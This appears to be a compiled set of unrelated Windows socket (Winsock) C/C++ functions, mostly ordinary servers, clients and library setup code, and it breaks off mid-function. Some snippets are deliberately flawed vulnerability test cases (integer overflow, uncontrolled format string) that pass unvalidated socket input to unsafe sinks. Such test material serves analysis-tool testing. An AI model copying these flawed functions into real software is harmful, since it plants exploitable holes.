S32 start_net(S32& socket_out, int& nPort) { // Create socket, make non-blocking // Init WinSock int nRet; int hSocket; int snd_size = SEND_BUFFER_SIZE; int rec_size = RECEIVE_BUFFER_SIZE; int buff_size = 4; // Initialize windows specific stuff if(WSAStartup(0x0202, &stWSAData)) { S32 err = WSAGetLastError(); WSACleanup(); LL_WARNS("AppInit") << "Windows Sockets initialization failed, err " << err << LL_ENDL; return 1; } // Get a datagram socket hSocket = (int)socket(AF_INET, SOCK_DGRAM, 0); if (hSocket == INVALID_SOCKET) { S32 err = WSAGetLastError(); WSACleanup(); LL_WARNS("AppInit") << "socket() failed, err " << err << LL_ENDL; return 2; } // Name the socket (assign the local port number to receive on) stLclAddr.sin_family = AF_INET; stLclAddr.sin_addr.s_addr = htonl(INADDR_ANY); stLclAddr.sin_port = htons(nPort); S32 attempt_port = nPort; LL_DEBUGS("AppInit") << "attempting to connect on port " << attempt_port << LL_ENDL; nRet = bind(hSocket, (struct sockaddr*) &stLclAddr, sizeof(stLclAddr)); if (nRet == SOCKET_ERROR) { // If we got an address in use error... if (WSAGetLastError() == WSAEADDRINUSE) { // Try all ports from PORT_DISCOVERY_RANGE_MIN to PORT_DISCOVERY_RANGE_MAX for(attempt_port = PORT_DISCOVERY_RANGE_MIN; attempt_port <= PORT_DISCOVERY_RANGE_MAX; attempt_port++) { stLclAddr.sin_port = htons(attempt_port); LL_DEBUGS("AppInit") << "trying port " << attempt_port << LL_ENDL; nRet = bind(hSocket, (struct sockaddr*) &stLclAddr, sizeof(stLclAddr)); if (!(nRet == SOCKET_ERROR && WSAGetLastError() == WSAEADDRINUSE)) { break; } } if (nRet == SOCKET_ERROR) { LL_WARNS("AppInit") << "startNet() : Couldn't find available network port." << LL_ENDL; // Fail gracefully here in release return 3; } } else // Some other socket error { LL_WARNS("AppInit") << llformat("bind() port: %d failed, Err: %d\n", nPort, WSAGetLastError()) << LL_ENDL; // Fail gracefully in release. return 4; } } sockaddr_in socket_address; S32 socket_address_size = sizeof(socket_address); getsockname(hSocket, (SOCKADDR*) &socket_address, &socket_address_size); attempt_port = ntohs(socket_address.sin_port); LL_INFOS("AppInit") << "connected on port " << attempt_port << LL_ENDL; nPort = attempt_port; // Set socket to be non-blocking unsigned long argp = 1; nRet = ioctlsocket (hSocket, FIONBIO, &argp); if (nRet == SOCKET_ERROR) { printf("Failed to set socket non-blocking, Err: %d\n", WSAGetLastError()); } // set a large receive buffer nRet = setsockopt(hSocket, SOL_SOCKET, SO_RCVBUF, (char *)&rec_size, buff_size); if (nRet) { LL_INFOS("AppInit") << "Can't set receive buffer size!" << LL_ENDL; } nRet = setsockopt(hSocket, SOL_SOCKET, SO_SNDBUF, (char *)&snd_size, buff_size); if (nRet) { LL_INFOS("AppInit") << "Can't set send buffer size!" << LL_ENDL; } getsockopt(hSocket, SOL_SOCKET, SO_RCVBUF, (char *)&rec_size, &buff_size); getsockopt(hSocket, SOL_SOCKET, SO_SNDBUF, (char *)&snd_size, &buff_size); LL_DEBUGS("AppInit") << "startNet - receive buffer size : " << rec_size << LL_ENDL; LL_DEBUGS("AppInit") << "startNet - send buffer size : " << snd_size << LL_ENDL; // Setup a destination address //char achMCAddr[MAXADDRSTR] = " "; /* Flawfinder: ignore */ stDstAddr.sin_family = AF_INET; //stDstAddr.sin_addr.s_addr = inet_addr(achMCAddr); stDstAddr.sin_addr.s_addr = INVALID_HOST_IP_ADDRESS; //Not so sure about this... stDstAddr.sin_port = htons(nPort); socket_out = hSocket; return 0; }
LIBRARY_API bool socketNet::create (struct networkStruct& socketData) { char ac[32]; char *client_ip_address = NULL; HANDLE hTimer = NULL; LARGE_INTEGER liDueTime; liDueTime.QuadPart=-30000000; //! 3 second timer for polling struct sockaddr_in serverAddr; //! server's socket address struct sockaddr_in clientAddr; //! client's socket address int sockAddrSize; //! size of socket address structure SOCKET newFd; //! socket descriptor from accept int ix = 0; //! counter for work task names int tcpServer_shutdown = 0; unsigned long l = 1; //! to set sockets to nonblocking hTimer = CreateWaitableTimer(NULL, TRUE, NULL); if (NULL == hTimer) { //! Timer error } //! Set up the local address sockAddrSize = sizeof (struct sockaddr_in); WSADATA wsaData; int wsaret = WSAStartup(0x101, &wsaData); if (wsaret != 0) return false; //! Clear (zero-out) serverAddr memset((char *) &serverAddr, 0, sockAddrSize); serverAddr.sin_addr.s_addr = htons (INADDR_ANY); serverAddr.sin_family = AF_INET; serverAddr.sin_port = htons ((u_short)socketData.sP); gethostname(ac, sizeof(ac)); struct hostent *phe = gethostbyname(ac); socketData.serverAddress = new char[128];//inet_ntoa (serverAddr.sin_addr); struct in_addr a1;//, a2, a3, a4; int i = 0; //while (phe->h_addr_list[i] != 0) { memcpy (&a1, phe->h_addr_list[i], sizeof(struct in_addr)); sprintf (socketData.serverAddress, "%s", inet_ntoa(a1)); ++i; } //! This allows us to have multiple clients attached to the same port if (!socketData.bound) { //! create a TCP-based socket if ((socketData.sFd = socket(AF_INET, SOCK_STREAM, 0)) == ERROR_F) { #ifdef NOISY perror ("socket"); #endif return false; } //! bind socket to local address if (bind (socketData.sFd, (struct sockaddr *) &serverAddr, sockAddrSize) == ERROR_F) { #ifdef NOISY perror ("bind"); #endif closesocket (socketData.sFd); WSACleanup (); return false; } socketData.bound = true; } //ioctlsocket (socketData.sFd, FIONBIO, &l); //! Create queue for client connection requests if (listen (socketData.sFd, SERVER_MAX_CONNECTIONS) == ERROR_F) { closesocket (socketData.sFd); WSACleanup (); socketData.bound = true; return false; } //! Accept new connect requests and spawn tasks to process them //! Accept the first connection and use it... newFd = 0; do { //! If we stop the connection attempt bool okay; okay = false; do { if (!settings_->globalRunServer) { closesocket (socketData.sFd); WSACleanup(); return false; } if ((newFd = accept (socketData.sFd, (struct sockaddr*)&clientAddr, &sockAddrSize)) == ERROR_F) { printf ("%s\n", inet_ntoa (clientAddr.sin_addr)); #ifdef NOISY perror ("accept"); #endif int g = WSAGetLastError(); //! We expect the error WSAEWOULDBLOCK since the socket is non-blocking if (g != WSAEWOULDBLOCK) { closesocket (socketData.sFd); WSACleanup (); return false; } // Set a timer to wait for 0.1 seconds--Poll @ 10 Hz if (!SetWaitableTimer(hTimer, &liDueTime, 1, NULL, NULL, 0)) { //! Timer error } if (WaitForSingleObject(hTimer, INFINITE) != WAIT_OBJECT_0) { //! Timer error } } else { okay = true; } } while (!okay); if (newFd > 0) { client_ip_address = inet_ntoa (clientAddr.sin_addr); //! JAM: A problem encountered with Windows is that it constantly //! thinks a connection from 204.204.204.204:52428 is being //! made if (strcmp("204.204.204.204", client_ip_address) != 0) { //! fill out the struct socketData.cFd = newFd; socketData.address = client_ip_address; socketData.cP = ntohs (clientAddr.sin_port); //! Disable nonblocking by default //unsigned long l = 0; //ioctlsocket (socketData.cFd, FIONBIO, &l); tcpServer_shutdown = 1; //! say we are done } } }while (tcpServer_shutdown != 1); socketData.connected = true; settings_->connected = true; //l=1; //ioctlsocket (socketData.cFd, FIONBIO, &l); return true; }
PUBLIC BOOL HTEventInit (void) { #ifdef WWW_WIN_ASYNC /* ** We are here starting a hidden window to take care of events from ** the async select() call in the async version of the event loop in ** the Internal event manager (HTEvtLst.c) */ static char className[] = "AsyncWindowClass"; WNDCLASS wc; OSVERSIONINFO osInfo; wc.style=0; wc.lpfnWndProc=(WNDPROC)AsyncWindowProc; wc.cbClsExtra=0; wc.cbWndExtra=0; wc.hIcon=0; wc.hCursor=0; wc.hbrBackground=0; wc.lpszMenuName=(LPSTR)0; wc.lpszClassName=className; osInfo.dwOSVersionInfoSize = sizeof(osInfo); GetVersionEx(&osInfo); /* According to Gary Johnson, GetModuleHandle() works for NT as well */ #if 0 if (osInfo.dwPlatformId == VER_PLATFORM_WIN32s || osInfo.dwPlatformId == VER_PLATFORM_WIN32_WINDOWS) wc.hInstance=GetModuleHandle(NULL); /* 95 and non threaded platforms */ else wc.hInstance=GetCurrentProcess(); /* NT and hopefully everything following */ #else wc.hInstance=GetModuleHandle(NULL); /* Should work on all win32 stuff */ #endif HTinstance = wc.hInstance; HTclass = RegisterClass(&wc); if (!HTclass) { HTTRACE(THD_TRACE, "HTLibInit.. Can't RegisterClass \"%s\"\n" _ className); return NO; } if (!(HTSocketWin = CreateWindow(className, "WWW_WIN_ASYNC", WS_POPUP, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, 0, 0, wc.hInstance,0))) { #ifdef HTDEBUG char space[50]; HTTRACE(THD_TRACE, "HTLibInit.. Can't Create Window \"WWW_WIN_ASYNC\" - error:"); sprintf(space, "%ld\n", GetLastError()); HTTRACE(THD_TRACE, space); #endif /* HTDEBUG */ return NO; } HTwinMsg = WM_USER; /* use first available message since app uses none */ /* Register platform specific timer handlers for windows */ HTTimer_registerSetTimerCallback(Timer_setWindowsTimer); HTTimer_registerDeleteTimerCallback(Timer_deleteWindowsTimer); #endif /* WWW_WIN_ASYNC */ #ifdef _WINSOCKAPI_ /* ** Initialise WinSock DLL. This must also be shut down! PMH */ { WSADATA wsadata; if (WSAStartup(DESIRED_WINSOCK_VERSION, &wsadata)) { HTTRACE(THD_TRACE, "HTEventInit. Can't initialize WinSoc\n"); WSACleanup(); return NO; } if (wsadata.wVersion < MINIMUM_WINSOCK_VERSION) { HTTRACE(THD_TRACE, "HTEventInit. Bad version of WinSoc\n"); WSACleanup(); return NO; } HTTRACE(APP_TRACE, "HTEventInit. Using WinSoc version \"%s\".\n" _ wsadata.szDescription); } #endif /* _WINSOCKAPI_ */ HTEvent_setRegisterCallback(HTEventList_register); HTEvent_setUnregisterCallback(HTEventList_unregister); return YES; }
void CWE190_Integer_Overflow__int_connect_socket_square_66_bad() { int data; int dataArray[5]; /* Initialize data */ data = 0; { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; SOCKET connectSocket = INVALID_SOCKET; char inputBuffer[CHAR_ARRAY_SIZE]; do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a connect socket */ connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (connectSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = inet_addr(IP_ADDRESS); service.sin_port = htons(TCP_PORT); if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed, make sure to recv one * less char than is in the recv_buf in order to append a terminator */ recvResult = recv(connectSocket, inputBuffer, CHAR_ARRAY_SIZE - 1, 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* NUL-terminate the string */ inputBuffer[recvResult] = '\0'; /* Convert to int */ data = atoi(inputBuffer); } while (0); if (connectSocket != INVALID_SOCKET) { CLOSE_SOCKET(connectSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } /* put data in array */ dataArray[2] = data; CWE190_Integer_Overflow__int_connect_socket_square_66b_badSink(dataArray); }
int CompletionPortListener::Start() { if ((Ret = WSAStartup((2, 2), &wsaData)) != 0) { printf("WSAStartup() failed with error %d\n", Ret); return 1; } else printf("WSAStartup() is OK!\n"); // Setup an I/O completion port if ((CompletionPort = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0)) == NULL) { printf("CreateIoCompletionPort() failed with error %d\n", GetLastError()); return 1; } else printf("CreateIoCompletionPort() is damn OK!\n"); // Determine how many processors are on the system GetSystemInfo(&SystemInfo); // Create worker threads based on the number of processors available on the // system. Create two worker threads for each processor for (i = 0; i < (int)SystemInfo.dwNumberOfProcessors * 2; i++) { // Create a server worker thread and pass the completion port to the thread if ((ThreadHandle = CreateThread(NULL, 0, ServerWorkerThread, this, 0, &ThreadID)) == NULL) { printf("CreateThread() failed with error %d\n", GetLastError()); return 1; } else printf("CreateThread() is OK!\n"); // Close the thread handle CloseHandle(ThreadHandle); } // Create a listening socket if ((Listen = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) { printf("WSASocket() failed with error %d\n", WSAGetLastError()); return 1; } else printf("WSASocket() is OK!\n"); InternetAddr.sin_family = AF_INET; InternetAddr.sin_addr.s_addr = htonl(INADDR_ANY); InternetAddr.sin_port = htons(DEFAULT_PORT_INT); if (bind(Listen, (PSOCKADDR)&InternetAddr, sizeof(InternetAddr)) == SOCKET_ERROR) { printf("bind() failed with error %d\n", WSAGetLastError()); return 1; } else printf("bind() is fine!\n"); // Prepare socket for listening if (listen(Listen, 5) == SOCKET_ERROR) { printf("listen() failed with error %d\n", WSAGetLastError()); return 1; } else printf("listen() is working...\n"); completionPortStackListener.Start(); // Accept connections and assign to the completion port while (TRUE) { if ((Accept = WSAAccept(Listen, NULL, NULL, NULL, 0)) == SOCKET_ERROR) { printf("WSAAccept() failed with error %d\n", WSAGetLastError()); return 1; } else printf("WSAAccept() looks fine!\n"); // Create a socket information structure to associate with the socket if ((PerHandleData = (LPPER_HANDLE_DATA)GlobalAlloc(GPTR, sizeof(PER_HANDLE_DATA))) == NULL) printf("GlobalAlloc() failed with error %d\n", GetLastError()); else printf("GlobalAlloc() for LPPER_HANDLE_DATA is OK!\n"); // Associate the accepted socket with the original completion port printf("Socket number %d got connected...\n", Accept); PerHandleData->Socket = Accept; if (CreateIoCompletionPort((HANDLE)Accept, CompletionPort, (DWORD)PerHandleData, 0) == NULL) { printf("CreateIoCompletionPort() failed with error %d\n", GetLastError()); return 1; } else printf("CreateIoCompletionPort() is OK!\n"); // Create per I/O socket information structure to associate with the WSARecv call below if ((PerIoData = (LPPER_IO_OPERATION_DATA)GlobalAlloc(GPTR, sizeof(PER_IO_OPERATION_DATA))) == NULL) { printf("GlobalAlloc() failed with error %d\n", GetLastError()); return 1; } else printf("GlobalAlloc() for LPPER_IO_OPERATION_DATA is OK!\n"); ZeroMemory(&(PerIoData->Overlapped), sizeof(OVERLAPPED)); PerIoData->BytesSEND = 0; PerIoData->BytesRECV = 0; PerIoData->DataBuf.len = DATA_BUFSIZE; PerIoData->DataBuf.buf = PerIoData->Buffer; Flags = 0; if (WSARecv(Accept, &(PerIoData->DataBuf), 1, &RecvBytes, &Flags, &(PerIoData->Overlapped), NULL) == SOCKET_ERROR) { if (WSAGetLastError() != ERROR_IO_PENDING) { printf("WSARecv() failed with error %d\n", WSAGetLastError()); return 1; } } else printf("WSARecv() is OK!\n"); } }
int send_file(HTHREAD_PTR descr, char *filename) { WSADATA wsa_data; SOCKET data_socket = INVALID_SOCKET; struct sockaddr_in send_data_addr; HPACKET packet; HPARTITION partition; FILE *fp; int return_code; unsigned long at_location, read_amount, tries; unsigned char packet_count; char control_message[MAX_INPUT_LENGTH]; if(fopen_s(&fp, filename, "rb") > 0) { memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); control_message[0] = CONTROL_MESSAGE_NO_SUCH_FILE; return_code = send(descr->socket, control_message, (int)strlen(control_message), 0); return 1; } for(tries = 0; tries < CONTROL_MESSAGE_RECV_RETRIES; tries++) { memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); return_code = recv(descr->socket, control_message, MAX_INPUT_LENGTH-1, 0); if(return_code < 1) { printf("failed to recv command: %d\n", WSAGetLastError()); closesocket(data_socket); return 0; } if(control_message[0] == CONTROL_MESSAGE_OK_START_SENDING) break; } if(tries >= CONTROL_MESSAGE_RECV_RETRIES) { printf("No CONTROL_MESSAGE_OK_START_SENDING from %s\n", inet_ntoa(descr->address.sin_addr)); closesocket(data_socket); return 0; } WSAStartup(MAKEWORD(2,2), &wsa_data); data_socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); send_data_addr.sin_family = AF_INET; send_data_addr.sin_port = htons(CONNECT_PORT_N);//descr->address.sin_port; send_data_addr.sin_addr = descr->address.sin_addr;//inet_addr("123.456.789.1"); packet.partition_id = 0; packet.reserved = 0; while(!feof(fp)) { memset(partition.packet_stats, 0, MAX_PARTITION_DIVISIONS+1); partition.actual_size = (unsigned long)fread(partition.data, 1, PARTITION_LENGTH_TOTAL, fp); packet_count = (unsigned char)ceil(partition.actual_size / PACKET_LENGTH_DATA); memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); sprintf_s(control_message, MAX_INPUT_LENGTH, " %u", partition.actual_size); control_message[0] = CONTROL_MESSAGE_SENDING_DATA; return_code = send(descr->socket, control_message, (int)strlen(control_message)+1, 0); if(return_code == SOCKET_ERROR) { printf("failed to send command: %d\n", WSAGetLastError()); closesocket(data_socket); return 0; } while(1) { for(packet.packet_id = 0; packet.packet_id < packet_count; packet.packet_id++) { if(partition.packet_stats[packet.packet_id] != 1) break; } if(packet.packet_id == packet_count) break; for(packet.packet_id = 0; packet.packet_id < packet_count; packet.packet_id++) { if(partition.packet_stats[packet.packet_id] != 1) { memset(packet.data, 0, sizeof(PARTITION_LENGTH_TOTAL)); at_location = packet.packet_id * PACKET_LENGTH_DATA; read_amount = at_location + PACKET_LENGTH_DATA < partition.actual_size ? PACKET_LENGTH_DATA : partition.actual_size - at_location; memcpy(packet.data, &partition.data[at_location], read_amount); packet.crc = compute_crc((const unsigned char *)packet.data, PACKET_LENGTH_DATA); return_code = sendto(data_socket, (char *)&packet, sizeof(packet), 0, (SOCKADDR *)&send_data_addr, sizeof(send_data_addr)); if(return_code == SOCKET_ERROR) { printf("failed to send command: %d\n", WSAGetLastError()); closesocket(data_socket); return 0; } Sleep(5); } } memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); control_message[0] = CONTROL_MESSAGE_PARTITION_SENT; return_code = send(descr->socket, control_message, (int)strlen(control_message)+1, 0); if(return_code == SOCKET_ERROR) { printf("failed to send command: %d\n", WSAGetLastError()); closesocket(data_socket); return 0; } for(tries = 0; tries < CONTROL_MESSAGE_RECV_RETRIES; tries++) { memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); return_code = recv(descr->socket, control_message, MAX_INPUT_LENGTH-1, 0); if(return_code < 1) { printf("failed to recv command: %d\n", WSAGetLastError()); closesocket(data_socket); return 0; } if(control_message[0] == CONTROL_MESSAGE_PARTITION_STATUS) { memset(partition.packet_stats, 0, MAX_PARTITION_DIVISIONS+1); memcpy(partition.packet_stats, &control_message[2], MAX_PARTITION_DIVISIONS); break; } } if(tries >= CONTROL_MESSAGE_RECV_RETRIES) { printf("No CONTROL_MESSAGE_PARTITION_STATUS from %s\n", inet_ntoa(descr->address.sin_addr)); closesocket(data_socket); return 0; } } packet.partition_id++; } fclose(fp); memset(control_message, 0, sizeof(MAX_INPUT_LENGTH)); control_message[0] = CONTROL_MESSAGE_ALL_DATA_SENT; return_code = send(descr->socket, control_message, (int)strlen(control_message)+1, 0); if(return_code == SOCKET_ERROR) { printf("failed to send command: %d\n", WSAGetLastError()); closesocket(data_socket); return 1; } closesocket(data_socket); return 1; }
/* Testing code for ld_event_base_dump_events(). Notes that just because we have code to exercise this function, doesn't mean that *ANYTHING* about the output format is guaranteed to remain in the future. */ int main(int argc, char **argv) { #define N_EVENTS 13 int i; struct event *ev[N_EVENTS]; evutil_socket_t pair1[2]; evutil_socket_t pair2[2]; struct timeval tv_onesec = {1,0}; struct timeval tv_two5sec = {2,500*1000}; const struct timeval *tv_onesec_common; const struct timeval *tv_two5sec_common; struct event_base *base; struct timeval now; #ifdef _WIN32 WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD(2, 2); WSAStartup(wVersionRequested, &wsaData); #endif #ifdef _WIN32 #define LOCAL_SOCKETPAIR_AF AF_INET #else #define LOCAL_SOCKETPAIR_AF AF_UNIX #endif if (ld_evutil_make_internal_pipe_(pair1) < 0 || ld_evutil_make_internal_pipe_(pair2) < 0) { sock_perror("ld_evutil_make_internal_pipe_"); return 1; } if (!(base = ld_event_base_new())) { fprintf(stderr,"Couldn't make event_base\n"); return 2; } tv_onesec_common = ld_event_base_init_common_timeout(base, &tv_onesec); tv_two5sec_common = ld_event_base_init_common_timeout(base, &tv_two5sec); ev[0] = ld_event_new(base, pair1[0], EV_WRITE, callback1, NULL); ev[1] = ld_event_new(base, pair1[1], EV_READ|EV_PERSIST, callback1, NULL); ev[2] = ld_event_new(base, pair2[0], EV_WRITE|EV_PERSIST, callback2, NULL); ev[3] = ld_event_new(base, pair2[1], EV_READ, callback2, NULL); /* For timers */ ev[4] = evtimer_new(base, callback1, NULL); ev[5] = evtimer_new(base, callback1, NULL); ev[6] = evtimer_new(base, callback1, NULL); ev[7] = ld_event_new(base, -1, EV_PERSIST, callback2, NULL); ev[8] = ld_event_new(base, -1, EV_PERSIST, callback2, NULL); ev[9] = ld_event_new(base, -1, EV_PERSIST, callback2, NULL); /* To activate */ ev[10] = ld_event_new(base, -1, 0, callback1, NULL); ev[11] = ld_event_new(base, -1, 0, callback2, NULL); /* Signals */ ev[12] = evsignal_new(base, SIGINT, callback2, NULL); ld_event_add(ev[0], NULL); ld_event_add(ev[1], &tv_onesec); ld_event_add(ev[2], tv_onesec_common); ld_event_add(ev[3], tv_two5sec_common); ld_event_add(ev[4], tv_onesec_common); ld_event_add(ev[5], tv_onesec_common); ld_event_add(ev[6], &tv_onesec); ld_event_add(ev[7], tv_two5sec_common); ld_event_add(ev[8], tv_onesec_common); ld_event_add(ev[9], &tv_two5sec); ld_event_active(ev[10], EV_READ, 1); ld_event_active(ev[11], EV_READ|EV_WRITE|EV_TIMEOUT, 1); ld_event_active(ev[1], EV_READ, 1); ld_event_add(ev[12], NULL); evutil_gettimeofday(&now,NULL); puts("=====expected"); printf("Now= %ld.%06d\n",(long)now.tv_sec,(int)now.tv_usec); puts("Inserted:"); printf(" %p [fd %ld] Write\n",ev[0],(long)pair1[0]); printf(" %p [fd %ld] Read Persist Timeout=T+1\n",ev[1],(long)pair1[1]); printf(" %p [fd %ld] Write Persist Timeout=T+1\n",ev[2],(long)pair2[0]); printf(" %p [fd %ld] Read Timeout=T+2.5\n",ev[3],(long)pair2[1]); printf(" %p [fd -1] Timeout=T+1\n",ev[4]); printf(" %p [fd -1] Timeout=T+1\n",ev[5]); printf(" %p [fd -1] Timeout=T+1\n",ev[6]); printf(" %p [fd -1] Persist Timeout=T+2.5\n",ev[7]); printf(" %p [fd -1] Persist Timeout=T+1\n",ev[8]); printf(" %p [fd -1] Persist Timeout=T+2.5\n",ev[9]); printf(" %p [sig %d] Signal Persist\n", ev[12], (int)SIGINT); puts("Active:"); printf(" %p [fd -1, priority=0] Read active\n", ev[10]); printf(" %p [fd -1, priority=0] Read Write Timeout active\n", ev[11]); printf(" %p [fd %ld, priority=0] Read active\n", ev[1], (long)pair1[1]); puts("======received"); ld_event_base_dump_events(base, stdout); for (i = 0; i < N_EVENTS; ++i) { ld_event_free(ev[i]); } ld_event_base_free(base); return 0; }
int main(int argc, char* argv[]) { //---------------------- // Initialize Winsock. WSADATA wsaData; int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); if (iResult != NO_ERROR) { wprintf(L"WSAStartup failed with error: %ld\n", iResult); return 1; } //---------------------- // Create a SOCKET for connecting to server SOCKET ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (ConnectSocket == INVALID_SOCKET) { printf("Error at socket(): %ld\n", WSAGetLastError() ); WSACleanup(); return 1; } //---------------------- // The sockaddr_in structure specifies the address family, // IP address, and port for the socket that is being bound. sockaddr_in addrServer; addrServer.sin_family = AF_INET; addrServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); addrServer.sin_port = htons(20131); //---------------------- // Connect to server. iResult = connect( ConnectSocket, (SOCKADDR*) &addrServer, sizeof(addrServer) ); if ( iResult == SOCKET_ERROR) { closesocket (ConnectSocket); printf("Unable to connect to server: %ld\n", WSAGetLastError()); WSACleanup(); return 1; } char buf[1024+1]; //以一个无限循环的方式,不停地接收输入,发送到server while(1) { int count = _read (0, buf, 1024);//从标准输入读入 if(count<=0)break; int sendCount,currentPosition=0; while( count>0 && (sendCount=send(ConnectSocket ,buf+currentPosition,count,0))!=SOCKET_ERROR) { count-=sendCount; currentPosition+=sendCount; } if(sendCount==SOCKET_ERROR)break; count =recv(ConnectSocket ,buf,1024,0); if(count==0)break;//被对方关闭 if(count==SOCKET_ERROR)break;//错误count<0 buf[count]='\0'; printf("%s",buf); } //结束连接 closesocket(ConnectSocket); WSACleanup(); return 0; }
void CWE134_Uncontrolled_Format_String__wchar_t_connect_socket_vfprintf_32_bad() { wchar_t * data; wchar_t * *dataPtr1 = &data; wchar_t * *dataPtr2 = &data; wchar_t dataBuffer[100] = L""; data = dataBuffer; { wchar_t * data = *dataPtr1; { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; wchar_t *replace; SOCKET connectSocket = INVALID_SOCKET; size_t dataLen = wcslen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a connect socket */ connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (connectSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = inet_addr(IP_ADDRESS); service.sin_port = htons(TCP_PORT); if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed, make sure to recv one * less char than is in the recv_buf in order to append a terminator */ /* Abort on error or the connection was closed */ recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(wchar_t) * (100 - dataLen - 1), 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* Append null terminator */ data[dataLen + recvResult / sizeof(wchar_t)] = L'\0'; /* Eliminate CRLF */ replace = wcschr(data, L'\r'); if (replace) { *replace = L'\0'; } replace = wcschr(data, L'\n'); if (replace) { *replace = L'\0'; } } while (0); if (connectSocket != INVALID_SOCKET) { CLOSE_SOCKET(connectSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } *dataPtr1 = data; } { wchar_t * data = *dataPtr2; badVaSink(data, data); } }
void bad() { size_t data; /* define a function pointer */ void (*funcPtr) (size_t) = badSink; /* Initialize data */ data = 0; { #ifdef _WIN32 WSADATA wsaData; int wsaDataInit = 0; #endif int recvResult; struct sockaddr_in service; SOCKET listenSocket = INVALID_SOCKET; SOCKET acceptSocket = INVALID_SOCKET; char inputBuffer[CHAR_ARRAY_SIZE]; do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR) { break; } wsaDataInit = 1; #endif /* POTENTIAL FLAW: Read data using a listen socket */ listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listenSocket == INVALID_SOCKET) { break; } memset(&service, 0, sizeof(service)); service.sin_family = AF_INET; service.sin_addr.s_addr = INADDR_ANY; service.sin_port = htons(TCP_PORT); if (bind(listenSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) { break; } if (listen(listenSocket, LISTEN_BACKLOG) == SOCKET_ERROR) { break; } acceptSocket = accept(listenSocket, NULL, NULL); if (acceptSocket == SOCKET_ERROR) { break; } /* Abort on error or the connection was closed */ recvResult = recv(acceptSocket, inputBuffer, CHAR_ARRAY_SIZE - 1, 0); if (recvResult == SOCKET_ERROR || recvResult == 0) { break; } /* NUL-terminate the string */ inputBuffer[recvResult] = '\0'; /* Convert to unsigned int */ data = strtoul(inputBuffer, NULL, 0); } while (0); if (listenSocket != INVALID_SOCKET) { CLOSE_SOCKET(listenSocket); } if (acceptSocket != INVALID_SOCKET) { CLOSE_SOCKET(acceptSocket); } #ifdef _WIN32 if (wsaDataInit) { WSACleanup(); } #endif } /* use the function pointer */ funcPtr(data); }
int main(int argc, char* argv[]) { SOCKET s,sock; struct sockaddr_in ser_addr,remote_addr; int len; char buf[128]; WSAData wsa; int retval; struct socket_list sock_list; fd_set readfds,writefds,exceptfds; timeval timeout; int i; unsigned long arg; WSAStartup(0x101,&wsa); s = socket(AF_INET,SOCK_STREAM,0); ser_addr.sin_family = AF_INET; ser_addr.sin_addr.S_un.S_addr = htonl(INADDR_ANY); ser_addr.sin_port = htons(0x1234); bind(s,(sockaddr*)&ser_addr,sizeof(ser_addr)); listen(s,5); timeout.tv_sec = 1; timeout.tv_usec = 0; init_list(&sock_list); FD_ZERO(&readfds); FD_ZERO(&writefds); FD_ZERO(&exceptfds); sock_list.MainSock = s; arg = 1; ioctlsocket(sock_list.MainSock,FIONBIO,&arg); while(1){ make_fdlist(&sock_list,&readfds); // make_fdlist(&sock_list,&writefds); // make_fdlist(&sock_list,&exceptfds); retval = select(0,&readfds,&writefds,&exceptfds,&timeout); if(retval == SOCKET_ERROR){ retval = WSAGetLastError(); break; } if(FD_ISSET(sock_list.MainSock,&readfds)){ len = sizeof(remote_addr); sock = accept(sock_list.MainSock,(sockaddr*)&remote_addr,&len); if(sock == SOCKET_ERROR) continue; printf("accept a connection\n"); insert_list(sock,&sock_list); } for(i = 0;i < 64;i++){ if(sock_list.sock_array[i] == 0) continue; sock = sock_list.sock_array[i]; if(FD_ISSET(sock,&readfds)){ retval = recv(sock,buf,128,0); if(retval == 0){ closesocket(sock); printf("close a socket\n"); delete_list(sock,&sock_list); continue; }else if(retval == -1){ retval = WSAGetLastError(); if(retval == WSAEWOULDBLOCK) continue; closesocket(sock); printf("close a socket\n"); delete_list(sock,&sock_list); continue; } buf[retval] = 0; printf("->%s\n",buf); send(sock,"ACK by server",13,0); } //if(FD_ISSET(sock,&writefds)){ //} //if(FD_ISSET(sock,&exceptfds)){ } FD_ZERO(&readfds); FD_ZERO(&writefds); 